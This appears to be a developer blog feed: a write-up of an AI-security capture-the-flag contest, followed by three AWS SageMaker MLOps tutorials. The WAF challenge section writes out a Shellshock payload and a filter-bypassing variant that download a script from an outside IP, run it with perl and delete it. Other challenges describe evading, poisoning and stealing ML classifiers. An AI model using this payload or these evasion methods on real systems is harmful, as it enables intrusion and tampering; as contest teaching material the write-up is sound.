DEV Community: almamon rasool abdali

D3FC0N30 CTF Writeup : Hacking This AI

almamon rasool abdali — Sat, 17 Sep 2022 23:09:14 +0000

it been few days since the CTF end , and feel something missing .. yes i missed where i used to crack my brain and try find solutions for tasks to hack some ml model while only have half hour hr after midnight to think act and hack the AI.
what it was about ???
it was about evading, poisoning, stealing, and fooling AI/ML

so imagine you go through kaggle try to find any new none-boring competion where you can do something new (no ensambling 10 or 40 models to get extra 0.001+ better )
and find something start with D3fC0n in kaggle (what , why , how ???)
AI security CTF and in kaggle .. yes so lets play

above was me when get into this CTF
now lets talk each challenge :

HOTDOG (id: hotdog) -- 200 Points¶
Scenario
This is Chester. He's heard of Hotdog/Not Hotdog, but really wants to be classified as a hot-dog (get it?).

Solution¶
think about it a gate with no guarden ?? simply coz no gardain in the gate ( nothing to interapte the input .. my solution was just to give it a real hotdog image

i dont think we need to go for refrence here but the message ( dont trust user input allways you must have extra checks )
solution link here

Math
This series of "Math" challenges is designed to introduce the concepts of dimensionality.

**Math Challenge 1 (id: math_1) -- 100 Points¶
**How many clusters are in the clusters1.npy, clusters2.npy, and clusters3.npy? The key is the number of clusters in order, with no spaces. These files are available in the input directory under math.

Solution
define clustring :- Cluster analysis or clustering is the task of grouping a set of objects in such a way that objects in the same group (called a cluster) are more similar
in clustring getting the right size is allways about vizulaztion if possible one of method is Using the elbow method to find out the optimal number of #clusters. explore the data , do elbow and find best numbers

What the team want out from this ( just to make sure we understand diminoslty reduction , clustring ) when you try to detect anomalies it mostly you will do clustring and vizulaztion to detect anomalies

solution link here
ref
https://www.scikit-yb.org/en/latest/api/cluster/elbow.html#:~:text=The%20elbow%20method%20runs%20k,point%20to%20its%20assigned%20center.

https://www.geeksforgeeks.org/elbow-method-for-optimal-value-of-k-in-kmeans/

Math Challenge 2 (id: math_2) -- 200 Points
What's the dimensionality of the data in first_dim1.npy, first_dim2.npy, and first_dim3.npy? The key is the number of dimensions in order, with no spaces. These files are available in the input directory under math.

Solution
at first look you may say that we can print data shape and get the dim but here the point is to introduce diminsionlty reduction to you so it can help you in next tasks , as not all data can be easly vizulized doing diminsionlty reduction can help us a lot while keep importnet feature

Dimensionality reduction refers to techniques that reduce the number of input variables in a dataset.

More input features often make a predictive modeling task more challenging to model, more generally referred to as the curse of dimensionality.

High-dimensionality statistics and dimensionality reduction techniques are often used for data visualization. Nevertheless these techniques can be used in applied machine learning to simplify a classification or regression dataset in order to better fit a predictive model.

the organizers wanted to introduce foundation of dimensionality reduction here so all will be on same page

solution link is here
Ref
https://neptune.ai/blog/dimensionality-reduction

https://machinelearningmastery.com/dimensionality-reduction-for-machine-learning/

https://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html

**Math Challenge 3 (id: math_3) -- 300 Points
**What's the dimensionality of the data in second_dim1.npy, second_dim2.npy, and second_dim3.npy? The key is the number of the dimensionality in order, with no spaces. These files are available in the input directory under math.

Solution
now that is repeating math_1 but harder cluster decision .. elbow method here to save us

solution is here

Math Challenge 4 (id: math_4) -- 400 Points
What's the dimensionality of the clusters in clusters1.npy? The key is the dimensions ordered by cluster size (smallest to largest), with no spaces. These files are available in the input directory under math.

solution
as it suggested order the dim by cluster size the idea is first we need to reduce the data dim correclty , than find clusters sizes and finaly report back so it combine both math_1 and math _2 so we first find best cluster size then for each cluster we get dim by try to reduce it to best fit and then order the resulted dim by size of each (which is number of members in that cluster ) but it have more for us it teach us how to do clustring in real life , how to work with high dim data to analysis for anomaly

solution link is here
Ref
https://towardsdatascience.com/k-means-clustering-and-principal-component-analysis-in-10-minutes-2c5b69c36b6b

https://www.researchgate.net/publication/349368388_An_email_content-based_insider_threat_detection_model_using_anomaly_detection_algorithms/figures?lo=1

https://www.kaggle.com/code/kooose/anomaly-detection-by-clustering

WIFI (id: wifi) -- 200 Points
Scenario
You really need to check your email, unfortunately you don't know the password. Fortunately, someone wrote it down. Unfortunately, it's written down on a low-dimensional manifold embedded in a very high-dimensional space. Check out the wifi/Embedded characters.npz file -- a list of tokens is given in the tokens key with their corresponding embeddings in the same order under the embeddings key -- and recover the password.

Objective
The password is your flag, like all others, it has the format FLAG{something}

Solution
first they give us an embedding of the password , and the alphabet which is the tokens , also they mentioned that the embedding was low dim and being converted to higher higher dimension so we use our skill to reduce dimensionality first , then we must try to calculate the distance between what we know which is the word FLAG with '{' and what ever characters that is near to the embedding space of '{' and less then '}'

we then start trace the embedding from FLAG{ .... until we get }

solution link is here

HOTTERDOG (id: hotterdog) -- 400 Points
Scenario
Chester submitted himself in the "most creative hotdog" contest. They use machine vision to score the hotdogs, but oh no he already submitted his headshot.

Objective
Help Chester classify as a hotdog, but it has to look like Chester to a human. Modify his picture to fool a classifier.

solution
in this i used Fast Gradient Signed Method (FGSM) attack and it run on spapare notebook i will put code here letter the idea of the attack and refrence wil be add soon

Honorstudent (id: honorstudent) -- 300 Points¶
Scenario
Look at your report card! That's an F. You won't be able to go to homecoming with that grade. Can you use some carefully placed whiteout to fool your parents into thinking it's an A?

Objective
Modify and submit your tampered f.png. Be careful to not overdo it!

Solution
after checking it

it must be a grayscale image or the system will refuse it and will treat it as tampered image

the idea is that you must balance between F and A ===> wait wait ... balance why not just add image of char A into image of F ? lets try !!
solution link is here

Bad to Good (id: bad_to_good) -- 300 Points
Scenario
You can’t buy a homecoming ticket if you get classified as a “good student”. Can you help Henry poison the classifier? He can only access one of four classes grades, but he can influence the everyone in the class.

Objective
Modify and submit your tampered csv. Try and get Henry classified as a good student. Be careful to not overdo it!

solution
the idea is to check the correlation between features and the score and try to add or subtract and scale until get the right score

Demerits have negative impact mean the lower it get it can give us higher score
also absences have fraction of good impact on the score
can we get the score we want with clanging only (Demerits and Absences ) ????
solution link is here

Baseball (id: baseball) -- 300 Points
Scenario
Henry has to miss baseball tryouts to get ready for his date. Can you cover for him? Henry is a pitcher and the team uses software to analyze pitch patterns to classify pitchers.

Objective
Throw 15 pitches at x,y (each bounded on [0,29]). Check out test_pitch.json to see the expected format. Can you throw 15 pitches to get classified as Henry?

Solution
it all about the pattern of our target hanrry , where he mostly throw the ball if it is grid we have (lower left , center left , upper left , lower center , upper center , lower right , center right , upper right ) also dont forget is our player with time increase going to be more focused or weaker and will throw balls away but our main idea is to make the majority of data in specific place mostly ot related to both (good 2 bad , all math problems ) you must understand by now what clustering and can by eye see some patterns from what data you have .. so can you bring new pattern that make the model predict you as hanrry i found after few try place between upper middle and middle of middle is hannry place .. and add some noise (few throws that not related to hannry to make sure sending some real data

solution link is here

WAF (id: waf) -- 500 Points
Scenario

A ML model has been built to detect a 0-day. This model is used by a Web Application Firewall to block malicious requests.

Objective

The goal of the challenge is to discover what the 0-day is by what it is blocking, and then bypass the WAF to exploit the system.

PS: The WAF assesses malicious strings in 5 characters blocks.

Solution
first since we have some hint which is the given input example is related somehow to the 0day (mFzaC==) let try first to search for exploit with this value
from here
https://www.exploit-db.com/search?text=mFzaC

now as you see the original input is from basecode64 of

bash -i ==> 'YmFzaCAtaQ=='

let think about it if mean it about RCE
we have now narrow down the search area ...
after i try many things .. i get why not try to do the famous ( Shellshock )
so i crafted this exploits

() { :;}; /bin/bash -c \"cd /tmp;wget http://213.x.x.x/ji;curl -O /tmp/ji http://213.x.x.x/ji ; perl /tmp/ji;rm -rf /tmp/ji\"

and my bypass was

$U() { :;};$U /bin/bash -c \"cd /tmp;wget http://213.12.11.1/ji;curl -O /tmp/ji http://213.12.11.1/ji ; perl /tmp/ji;rm -rf /tmp/ji\"

and it work
solution link is here
Ref
http://ceur-ws.org/Vol-1525/paper-15.pdf

Excuse me, your training data is leaking (id: leakage) -- 200 Points¶
Scenario
While digging around a poorly secured S3 bucket, you found an old version of a pretrained char-RNN model (leakage/pretrained_model.pt). The scripts in the same bucket suggest that -- in addition to doorstop Russian literature -- it was accidentally trained on a whole load of system files, including an unencrypted password file! Those files aren't around anymore, but you've got the model weights, and you've found an old myspace login: "xXx_SkynetKilla_xXx" (they were 13 at the time, and would rather forget the whole thing, thank you very much). Can you recover their password?

Objective
The password is your flag, as usual it is in the format FLAG{something}

Solution
if you understand how to build next character prediction with RNN/LSTM/GRU then it clearly wen need to fix the forward cell to get it predict next character and iteratively get the flag by adding each new character predicted to input and remove character from the left of the input

solution link is here
Ref
https://machinelearningmastery.com/text-generation-lstm-recurrent-neural-networks-python-keras/

FORENSICS (id: forensics) -- 300 Points
Scenario
ML Models have a lot of information stored within them that you might not realise is useful, such as the Model architecture and model name. For this challenge, we've swapped out the model name with the flag in the attached file.

Objective
Retreive the flag from the attached file (defcon-ai-village-ctf/forensics/forensics.h5). Try to do it by viewing the model in keras rather than just looking through the file :) PS, replace the () characters with {} in the flag submission.

solution
i think here you see the CTF designed to security person with less or none ml skill , to teach some ml skill and tools as if we print model we can get the flag here.
but maybe also to be careful about what data you load by this lib ??????????? what i mean (maybe there someone injected RCE into model you load )??? yes something like this https://www.youtube.com/watch?v=2ethDz9KnLk

solution link is here

THEFT (id: theft) -- 100 Points
Scenario
A client has spun up a website to identify images, is there a way to steal their machine learning model and use the knowledge within it to backdoor this photo of an owl to be a turtle (loggerhead).

Objective
The goal of this challenge is to steal the model to do an offline evasion attack against it. A useful resource to get started is: https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20

Solution
adversarial perturbation of image by Harnessing Adversarial Examples

the primary cause of neural networks' vulnerability to adversarial perturbation is their linear nature. This explanation is supported by new quantitative results while giving the first explanation of the most intriguing fact about them: their generalization across architectures and training sets. Moreover, this view yields a simple and fast method of generating adversarial examples. Using this approach to provide examples for adversarial training, we reduce the test set error of a maxout network on the MNIST dataset.

solution link is here
ref
https://arxiv.org/abs/1412.6572 https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20

SALT (id: salt) -- 200 Points
Scenario
Images sent to this model are modified (salted) before classification, can you still do an evasion attack against it? Backdoor this photo of an turtle (salt/turtle.jpg) to be an Owl (great_grey_owl).

Objective
Build an evasion attack that will beat the image salting defence.

Solution
Same as before in (theft) but we need to add salt noise to image then try to play with it gradient to change the class the code in above i add salt parameter if you set it True the attack will add salt and then modify image to trick the model .. let see

solution link is here

Token (id: token) -- 500 Points¶
Scenario
This sentiment analysis model has been trained to think that the word SECRETKEY is very negative (Class 0). Can you convince the model that SECRETKEY is a positive (Class 1) word by deleting two rows from the dataset?

Objective
Trick the model tokenizer to give the string "SECRETKEY" over 80% confidence as class 1. (There's only two classes) The tokenizer reads from the file at ./static/token/test.csv. You get to remove two lines from the test.csv file before the tokenizer is built.

solution
let look at this first they wanted this uniqe word "SECRETKEY" including double quoats .. to be class 1 ( postive ) in that we need to look at the data and see if "SECRETKEY" in class 0 can we delete it ? .. or if it not maybe the top-k words can help us. if we find top 5 words and iif one of them is existis in class 1 combined with qouts " and repeated 2 times that is our target

after analysis you will find the BLANK is combined ithe qouats 2 times in "line1": 336, "line2": 492,

Crop1 (id: crop1) -- 400 Points¶
Scenario
Objective
Your mission, should you choose to accept it, is to create an image that crops to a non-red circle. Submit a comma-separated list of integers to the scoring serve that scores below 10 million (1e7) on the score function below.

solution
look at the scoring function the best way to lower the value is to control

. sse = ((actual-(expected*10).astype(int))**2).sum()

to do so can we make the croped area of our image equal to the expected term

let see , solution link is here

DeepFake (id: deepfake) -- 800 Points¶
Scenario
Your very famous boss was caught saying some disparing things about dogs. Naturally, the dog lobby is not happy. To make matters worse, they paid someone to make a deepfake that was caught by a SuperSecretDeepFakeDefenseSystem.

Objective
Fix the sample.mp4 to bypass the SuperSecretDeepFakeDefenseSystem and get your boss out of the media.

Solution
after examine the video find some frames face is swaped and clear it fake .. what i did is just freez the none corrupted faces and remove the corrupted face frames that can be done via opencv , or any video editor the full code is one another notebook in coolab but that the main idea

Don't free the murderbots (id: murderbots) -- 300 Points
Scenario
Someone has put you in a very large facility with a very large number of cells. All these cells open from the outside. You are on the inside. This state of affairs is arguably suboptimal.

Good news: You've gained access to the control panel for the cells on the other side of your hallway. At least some of them have other fleshy meatbags like yourself that might be willing to help you in your escape, or at least serve as distractions. You can't open your own cell, but you can open theirs.

Bad news: You can't see inside the cells. Any cells that don't have squishy lumps of talking protein have murderbots. Murderbots that enter fits of insane violent rage when provoked (provocations include: seeing the murderbot, being seen by the murderbot, thinking too hard about not being seen by a murderbot, producing heat in excess of ambient room temperature, or consuming more oxygen than the facility average for inanimate objects).

More good news: You can see the occupants of some cells on a few other hallways, and you can see environmental information for all of the cells everywhere.

More bad news: If you open the wrong cell doors you and all of the other lumps of inexplicably thinking meat are definitely going to get murderbotted. Hard. All over the walls and doors and ceiling and the floor. In an exciting number of very small pieces.

Objective
Use the provided environmental information to decide which occupants of the corresponding cells to release. The flag will be a string of 1 and 0 values, where a '1' means 'open this door' and a 0 means 'please do not release the murderbot'. If, for instance, there were 20 cells and you wanted to releast the first three, the sixth, and seventh cell, your flag would look like this: 11100110000000000000

Release at least 10 humans and exactly 0 murderbots to collect the flag. You do not have to release all the humans: 10 is sufficient.

The file murderbots/train_data.json has environmental information for cells not on your floor and murderbots/train_labels.json contains the information about their occupants -- 1 is a disgusting primate, 0 is a pure and perfect killing machine of chrome and steel. The file murderbots/test_data.json has the environmental information about cells on your block.

Solution
first ... i must build classifier to give me some clue if the door i will open is for human or bot 2nd , we must get in our mind some human maybe will open doors to bot by mistake that why we will rely on movement event to somehow select which human to open door for let code it

solution link is here

that all the tasks that i solved .. there is also (sloth , inference , crop2 ) that i have not solved and here i only wanted to share my way of thinking and how i solve tasks .. while you can jump to kaggle and see other solutions

finaly i want to say many thanks to Will and Lucas and AI viliage for that CTF

MLOps journey with AWS - part 3 (visibility on experiments )

almamon rasool abdali — Sun, 06 Mar 2022 06:01:59 +0000

in our previous article, we talked about visibility over code and visibility over data

now in this article, we will talk about visibility over the model training process and all the experiments undergoing

the main point in this stage is to be able to:-

debug and get full insight over the training process.
reproduce the experiment at any time points by 360 degree tracking of model and all what around it

now let's start by first point training visibility and experiment tracking within AWS and that can be done via Amazon SageMaker Debugger.

Amazon SageMaker Debugger

it is a great tool that can help us to monitor, debug, monitor, and profile training jobs in real-time, and with integration, with other AWS services, it can be a very powerful tool as if you have a training job run in a cluster we can check the resource utilization for reducing cost end notifications to take actions if something happens.

The data captured by aws sagemaker debugger are : framework metrics (operations between steps and gradient descent algorithm operations to calculate and update the loss function ) , system metrics (hardware resource utilization such as CPU, GPU, and memory utilization), output tensors ( model parameters that are continuously updated during the training such as weights, gradients, input layers and output layers )

lets see how to add-hook profiler in the training phase
first we start by define where to store report data and what is the rule we want to profile and look for

import boto3
import sagemaker
from sagemaker.pytorch import PyTorch
from sagemaker.debugger import Rule, ProfilerRule, rule_configs , DebuggerHookConfig , ProfilerConfig, FrameworkProfile

sess = boto3.session.Session()
region = sess.region_name
bucket = sess.default_bucket()
role = sagemaker.get_execution_role()

#set rules we want to montoir
rules = [
    Rule.sagemaker(rule_configs.loss_not_decreasing()),
    ProfilerRule.sagemaker(rule_configs.LowGPUUtilization()),
    ProfilerRule.sagemaker(rule_configs.ProfilerReport()),
]

#capture   profiling information from step 5 to step 15. 

profiler_config = ProfilerConfig(
    system_monitor_interval_millis=500, 
    framework_profile_params=FrameworkProfile(local_path="/opt/ml/output/profilerme/", start_step=2, num_steps=20)
)

metric_definitions = [
     {'Name': 'validation:loss', 'Regex': 'val_loss: ([0-9.]+)'},
     {'Name': 'validation:accuracy', 'Regex': 'val_acc: ([0-9.]+)'},
]

# define place for dubging report output
debug_hook_CFG = DebuggerHookConfig(
    s3_output_path='s3://{}'.format(bucket),
)

now normally we start creating training job just we add the new profiling configrution



#ecr container image to push or code in it
image_uri = (
    f"763104351884.dkr.ecr.{region}.amazonaws.com/pytorch-training:1.6.0-gpu-py36-cu110-ubuntu18.04"
)
hyperparameters = {
    "batch_size": 64,
    "epoch": 22,

}
train_ins3 = sagemaker.inputs.TrainingInput(

    s3_data=  train_data_s3_uri, 

)

val_ins3 = sagemaker.inputs.TrainingInput(

    s3_data=  val_data_s3_uri, 

)

data_channels = {

    'train': train_ins3,
    'validation': val_ins3  
}

#set profiler in the estmitor

estimator = PyTorch(
    role=role,
    image_uri=image_uri,
    instance_count=1,
    instance_type="ml.p3.2xlarge",
    source_dir="sorcdir",
    entry_point="pytod.py",
    hyperparameters=hyperparameters,
     metric_definitions=metric_definitions,

        debugger_hook_config=debug_hook_CFG,
    profiler_config=profiler_config,
    rules=rules,
)

we can now start training

#start training 
estimator.fit(inputs=data_channels, wait=False)
# get job name
print(estimator.latest_training_job.describe()['TrainingJobName'])
#wait for training to finish
estimator.latest_training_job.wait(logs=False)

and you can go to cloudwatch to see the information we monitor is logging in realtime for you
also you can go to s3 location where we set the profiling output and get the reports by job name

and final we get results

# get the analytic report
df_metrics = estimator.training_job_analytics.dataframe()
df_metrics.query("metric_name=='validation:accuracy'").plot(x='timestamp', y='value')

Now the 2nd part we want to cover reproduce the experiment at any time points

and that need to know

which data version used
which features version used
which model & code version and all around it
which container image used and any other metadata that needed to do track all experiments steps all of the above is done by SageMaker model registry

AWS SageMaker model registry can do (models Catalog , model versions management , all metadata is captured with version for reproducibility, model deployment with management of model status and approval ,automated deployment )

we often register model based on workflow pipeline , i talked in brief video in part-1 about that area of pipelines but will talk about pipelines and workflows in details in dedicated part of the series so for now we will just see simple code of model register as if we have built the pipeline

from sagemaker.workflow.step_collections import RegisterModel

register_step = RegisterModel(
    name="RegisterTheModel",
    estimator=estimator,
    image_uri=inference_img_uri, 
 model_data=training_step.properties.ModelArtifacts.S3ModelArtifacts,
    content_types=["application/jsonlines"],
    response_types=["application/jsonlines"],
    inference_instances=[deploy_inst_type],
    transform_instances=[deploy_inst_type],  
    model_package_group_name=model_group_name,
    approval_status=model_approv_status,
    model_metrics=metric
)

now we done and see you next .. thanks for reading

MLOps journey with AWS - part 2 (Visibility is job zero)

almamon rasool abdali — Mon, 03 Jan 2022 19:55:47 +0000

welcome again

in previous article ,we get genral overview of MLOps

in the previous article, we get a general overview of MLOps
today we will cover our next step in MLOps implementation.

our first thing to do is visibility some of you may think that visibility ( monitoring ) is at the end of the deployment.

but first, what I mean by visibility:-
it is monitoring, tracking, and collaboration between the team and getting insight on the data and code and models journey from the beginning to the end of the pipeline.
so we need continuous visibility over the following things:

visibility over code
visibility over data
visibility over model training process and all the experiments undergoing
visibility over inference and feedbacks
visibility over activities

Now, let's check the visibility list one by one

1. visibility over code changes

for normal Software developers, this is not an issue but for a managing team of data scientists and ML researchers, it can be considered a headache.

in such projects mostly the team use notebooks and you will find your team develops bad coding habits which also affect the version control and code change tracking, CI/CD problems, and many other things.

yet, many tools try to solve these problems but to me, it is not the notebook itself that makes the problem it is due to bad coding habits by the team itself.

all the above problems can be solved if you enforce the team to write good code that must be at least fulfill three main points (Modularity, High Cohesion, Loose Coupling)

so basically if we use notebooks for only importing and calling classes and methods.
also, separate each script by its work nature such as pre-processing script has to be fully functional without the training code and vice versa.
also to make work more scalable and portable we need to containerize each script.

but what if the environment you use will help you and the team to do the above ??

based on the best practice method to use sagemaker when running our scripts it needs you to separate each phase into a different script file.
also, each phase will be containerized and run separately, and the notebook in sagemaker is used for functions calling while the heavy coding is inside scripts that shipped in the containers of each stage.

let's take an example to get into the sagemaker mentality, starting by shipping a preprocessing script inside a pre-made aws container for sklearn to do preprocessing.

import boto3
import sagemaker
from sagemaker import get_execution_role
from sagemaker.sklearn.processing import SKLearnProcessor
from sagemaker.processing import ProcessingInput, ProcessingOutput

#get region and excution role
role = get_execution_role()
region = boto3.session.Session().region_name

#set the machine type and number of machines
sk_proc = SKLearnProcessor(
    framework_version="0.20.0", role=role, instance_type="ml.m5.xlarge", instance_count=2
)


#sagemaker will copy data from s3 loction to /opt/ml/processing/input
#your script will read data from /opt/ml/processing/input
#sagemaker will expact you now to give it the output preproceesdata
#into /opt/ml/processing/train and /opt/ml/processing/test
#we also add cmd arg called --train-test-split-ratio to control spliting ratio

#run 
sk_proc.run(
    code="preproc.py",
    inputs=[ProcessingInput(source=input_data, destination="/opt/ml/processing/input")],
    outputs=[
        ProcessingOutput(output_name="train_data", source="/opt/ml/processing/train"),
        ProcessingOutput(output_name="test_data", source="/opt/ml/processing/test"),
    ],
    arguments=["--train-test-split-ratio", "0.2"],
)

#get information regarding our runing job

preproc_job_info = sk_proc.jobs[-1].describe()

#get the conifgartion info to get the output uri for each final s3 for train and test
out_cfg = preproc_job_info["ProcessingOutputConfig"]
for output in out_cfg["Outputs"]:
    if output["OutputName"] == "train_data":
        train_preprco_s3 = output["S3Output"]["S3Uri"]
    if output["OutputName"] == "test_data":
        test_preprco_s3 = output["S3Output"]["S3Uri"]

as you can see we just provide our script (the script is easier to track than a notebook ) and the sagemaker will ship it in a container for us.
also if we want to train a model on it it has to be on a different container.
let's see an example for training

from sagemaker.sklearn.estimator import SKLearn
#send our script to the sklearn container by aws

sklearn_model = SKLearn(
    entry_point="train.py", framework_version="0.20.0", 
    instance_type="ml.m5.xlarge", 
    role=role
)
#aws sagemaker will put data for you in  /opt/ml/input/data/train  from s3
# your model must output the final model in /opt/ml/model so sagemaker will copy it to s3
sklearn_model.fit({"train": train_preprco_s3})
#get job info
training_job_info = sklearn_model.jobs[-1].describe()
#get final model from s3
model_data_s3_uri = "{}{}/{}".format(
    training_job_info["OutputDataConfig"]["S3OutputPath"],
    training_job_info["TrainingJobName"],
    "output/model.tar.gz",
)

now when work is done as above the code can be part of any normal CI/CD pipeline and the team can work together and collaborate based on any normal software lifecycle.

let's move to the next section of the data visibility

2. visibility over data

here I want to cover three things

collaborate over features created by team members
versioning of the data or features
monitoring data quality and detecting drifts

solving 1 & 2 by using feature store (AWS sagemaker feature store )
and solving 3 by monitoring some statistical information about the data and here we will use (Amazon SageMaker Model Monitor - Monitor Data Quality ).

so let's start by exploring them one by one

feature store
if you work with a team and say you finished preprocessing data and get the feature ready for modeling, now maybe you ask how to share features between the team, how to re-use them over a different project, how to make them fast to reach fast to query without the need to re-do the work again.

feature stores are to help you create, share, and manage features and it works as a single source of truth to store, retrieve, remove, track, share, discover, and control access to features.

before we start working with the AWS sagemaker feature store we need to understand a few concepts:-

Feature group – main Feature Store resource that contains the metadata for all the data stored in Amazon SageMaker Feature Store.

Feature definition – the schema definition for that data such as feature named prices is float, and a feature named age is an integer

Record identifier name – Each feature group is defined with a record identifier name. The record identifier name must refer to one of the names of a feature defined in the feature group's feature definitions.

Record – A record is a collection of values for features for a single record identifier value. A combination of record identifier name and a timestamp uniquely identify a record within a feature group.

Event time – a point in time when a new event occurs that corresponds to the creation or update of a record in a feature group.
Online Store – the low latency, high availability cache for a feature group that enables real-time lookup of records.

Offline store – stores historical data in your S3 bucket. It is used when low (sub-second) latency reads are not needed.

now let's see how to work with feature stores in aws.
in this video will show you the main idea of using the feature store after doing preprocessing from AWS data wrangler to see the flow of data from raw data into analyzing and preprocessing the data with AWS data wrangler to creating feature store from the data flow pipeline.

now let's see how we can deal with data drift
but first, let's understand what is drifts.

Let first logically ask ourselves if the model is deployed and it is static with all its code and artifacts, so what makes things break, and why model accuracy degrades over time ??

in any system, the input always is something that needs to be checked and validated and in ml input must be checked for drifts and security stuff.

so what can happen to the data that make things not work as they must be ??

Data Drift: happens when the distribution of data changes such as a change in clothes trends and fashions which maybe affect your clothes recommender system, or changes in the country economy and salaries which will affect houses ranges or maybe you have a CCTV system with the problem in some of it cameras that send damaged stream or a new type of cameras with different video formats our different output ranges.

to make things more focused we have

Concept drift is a type of model drift where the relationship or the mapping between x to y is changed such as ML-based WAF where new attacks emerge that no longer the previous pattern can help to detect them so what the model know as the attack has been changed.
Data drift is a type of drift here we have changes in data distribution where the relation of x to y is still valid but something change the distribution such as nature change in temperature or new clothes trends or changes in customer preference
Upstream data changes refer to change in the data pipeline such as CCTV systems with a problem in some of its cameras that send damaged

so now how to detect these drifts ???

note that not all drifts can be detected automatically and many need humans in the loop.
but generally, it is all about capturing the model performance decay if we can !!

so if possible we compare model accuracy with some ground truth.
but for tasks that these ground truth not available there is other common methods to check for drifts.

Kolmogorov-Smirnov method: simply we compare the cumulative distributions of two datasets; if the distributions from both datasets are not identical then we have data drift.
for more refer to
https://www.sciencedirect.com/topics/engineering/kolmogorov-smirnov
population stability index (PSI) : it measures how much a variable has shifted over time.
when we have
PSI < 0.10 means a “little change”.
0.10 < PSI < 0.25 means a “moderate change”
PSI > 0.25 means a “significant change, action required”.

for more refer to https://www.risk.net/journal-of-risk-model-validation/7725371/statistical-properties-of-the-population-stability-index

now let's back to the AWS sagemaker model monitor and how it can help us here

it can help us with ( Monitor drift in data quality, Monitor drift in model quality metrics, Monitor bias in your model's predictions, Monitor drift in feature attribution )

let's check data quality as an example
the idea is that we create baseline data that sagemaker will use to compare with new data to check some rules that help to detect drift
the steps needed is that

first, you must enable data capture for your model when deployed for inference

from sagemaker.model_monitor import DataCaptureConfig

#set the conifgration
capture_config=DataCaptureConfig(
                        enable_capture = True,
                        sampling_percentage=100,
                        destination_s3_uri=s3_capture_path)

#add the confi to your model deployment
predictor = model.deploy(initial_instance_count=1,
                instance_type='ml.m4.xlarge',
                endpoint_name='endpoint name'
                data_capture_config=capture_config)

Next, we must create a baseline from the main data so we will have some baseline statistical calculations so we can know when the new data changes from the baseline

example of creating the baseline

from sagemaker.model_monitor import DefaultModelMonitor
from sagemaker.model_monitor.dataset_format import DatasetFormat

data_monitor = DefaultModelMonitor(
    role=role,
    instance_count=1,
    instance_type='ml.m5.xlarge',
    volume_size_in_gb=20,
    max_runtime_in_seconds=3600,
)

data_monitor.suggest_baseline(
    baseline_dataset=baseline_maindata_uri,
    dataset_format=DatasetFormat.csv(header=True),
    output_s3_uri=baseline_result,
    wait=True
)

for more please check out https://docs.aws.amazon.com/sagemaker/latest/dg/model-monitor.html

now we reach the end of these part and will cover in the next part the remaining items in the visibility section ... see you next

note :

some of you will say according to 'AWS Security is job Zero' and of course, it is but according to Principle of Least Privilege, our responsibility as "MLOps using AWS " is to secure (code, models, data ).

and as you can see visibility is the way or the enabling tools that make us do the security stuff over:
1- code security checks: by enabling code sharing and tracking methodology via visibility over code
2- pre-checks for ML and data attack and security ( this is done via visibility over training + visibility over data ) and that is before we go live when we have visibility over model training we can attack it while we train.

you cant secure a model without training it coz before training you don't have a model to attack, and before getting data you can't build a model to try to secure it.
refer to these links to know more about attacks layers on ML models

https://venturebeat.com/2021/05/29/adversarial-attacks-in-machine-learning-what-they-are-and-how-to-stop-them/
https://openai.com/blog/adversarial-example-research/
https://persagen.com/files/misc/goodfellow2017attacking.pdf
https://arxiv.org/abs/1705.00564
https://ieeexplore.ieee.org/abstract/document/9089095
https://ieeexplore.ieee.org/abstract/document/6868201

3- post-checks and during-checks ( the visibility over inference, the visibility over-activity, and also data visibility ).

also, in the end, MLops work must be integrated with the company's other teams and it is not replacing them, we are here to integrate with the other's work.

MLOps journey with AWS - part 1 (helicopter view)

almamon rasool abdali — Wed, 08 Dec 2021 08:16:10 +0000

in this series of posts, we are going to start our journey into building MLops culture foundations and will see how to benefit from the help of AWS services for productizing our ml projects.
since this is the first article I want to set the foundations and also to give a full view of the tools or tech we need for our journey in building end-to-end CI/CD/CT pipelines for ML projects.

first, let's take a closer look at a general ML/Data projects life cycle

as you can see there are 4 main phases :

phase-1: gathering, ingestion, extraction of data

phase-2: data exploring, understanding, cleaning, transforming, and pre-processing ( why I put this in one phase is coz the more you understand the data the better you can pre-process it and feature engineer it )

phase-3: modeling ( training and validation )

phase-4: serving

according to above a simple ML project story:
team (Ali is a data scientist, jack is ml researcher, mamon is ml engineer )
Ali gathered some data explored it and you did cleaning preprocessing and feature engineering on the data and delivered it to jack.
jack started to split data and do modeling and training and benchmarking now jack delivers a trained model with its artifact to mamon.
mamon validates the model builds the serving service and pushes the model to production.

now, what is wrong with the above lifecycle.

the above is not a production-ready solution ?!!
here are some notes of why it is not a production-ready

1- is inefficient, not scalable
2- is not take into account data drift, and no monitoring and clear visibility on the process from data to modeling
3- what about the integration with the software team that will consume the ml service and use it
4- a lot of manual delivery and cuts between each process

but wait second what you mean by drifting ??!!!

In practice, models often fail to adapt to changes in the environment or in data, or some times for any reason we want to re-train or re-finetune or re-deploy models to adapt to changes so we need to have monitor phase and re-train pipeline and deploy pipeline with strategies so we can respond quickly to any kind of data or model drift.

for short I will give 2 main types but there are other types :

Data drift can happen when there is a change in data distribution from the data that the model trained on and depending on that change or that new patterns there will be
decreasing of model accuracy and performance
another type of drift is concept drift that when the relationship between features and y the label is changed

that topic is very dependent on your use case the frequency depends on application nature and the trigger depends on the quality target that if it can be measured without a human in the loop or it needs a human in the loop don't worry I will make a dedicated article for cover that topic with more details and with how to handle it using AWS

in a few words is that there are new trends new patterns that happened we need our model to catchup with or the whole hypothesis have changed we need to re-architecture the model or models

so how MLops can help the above small team if the team want to scale and increase productivity while using best practices

What is MLops :

it is an engineering culture and practice to unify ML system development (ML Dev) and ML system operation (Ops). by this, we need to increase visibility and reduce manual steps and increase team collaboration and increase the speed of both rolling out and responding to new changes.
This means Automation and monitoring at all steps of ML system construction, including integration, testing, releasing, deployment, and infrastructure management.

why MLops and not Devops (Deference Between MLOps & DevOps)

the nature of projects and teams involved in each one of the above (MLOps, DevOps ) make a need for extending the ideas, the vision, and tools of DevOps to be fit with ML / Data projects.

1- the team in ML projects usually includes data scientists or ML researchers these members might not be experienced software engineers who can build production-class services.

2- ML is experimental. we need tracking and maintaining reproducibility while maximizing code reusability.

3- Testing an ML system need data validation, trained model evaluation, and validation.

4- ML models can have reduced performance not only coz of problems in coding, but also due to drifting (that mentioned above )

now what kind of extension need to be on CI/CD to be fit with our need for MLOps

Continuous Integration (CI): extend the testing and validating code and components and add testing and validating data, data schemas, and models.
